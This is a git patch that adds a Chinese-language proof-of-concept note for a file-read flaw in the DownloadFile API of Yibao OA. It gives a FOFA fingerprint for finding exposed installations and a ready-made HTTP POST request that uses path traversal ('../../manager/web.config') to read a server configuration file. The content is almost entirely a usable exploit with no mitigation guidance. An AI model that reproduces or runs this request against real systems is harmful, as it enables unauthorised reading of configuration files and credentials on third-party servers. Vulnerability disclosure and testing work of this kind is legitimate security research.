From 06f9f438e9b397b1f77b4efab178429af5a47675 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 1 Mar 2024 15:27:50 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=98=93=E5=AE=9DOA=E7=B3=BB=E7=BB=9F?= =?UTF-8?q?DownloadFile=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 易宝OA系统DownloadFile接口存在文件读取漏洞.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 易宝OA系统DownloadFile接口存在文件读取漏洞.md diff --git a/易宝OA系统DownloadFile接口存在文件读取漏洞.md b/易宝OA系统DownloadFile接口存在文件读取漏洞.md new file mode 100644 index 0000000..669248e --- /dev/null +++ b/易宝OA系统DownloadFile接口存在文件读取漏洞.md @@ -0,0 +1,18 @@ +## 易宝OA系统DownloadFile接口存在文件读取漏洞 + +## fofa +``` +"顶讯科技" +``` + +## poc +``` +POST /api/files/DownloadFile HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 +Content-Length: 94 +Accept-Encoding: gzip +Content-Type: application/x-www-form-urlencoded + +token=zxh&requestFileName=../../manager/web.config&pathType=1&startPosition=0&bufferSize=1000 +```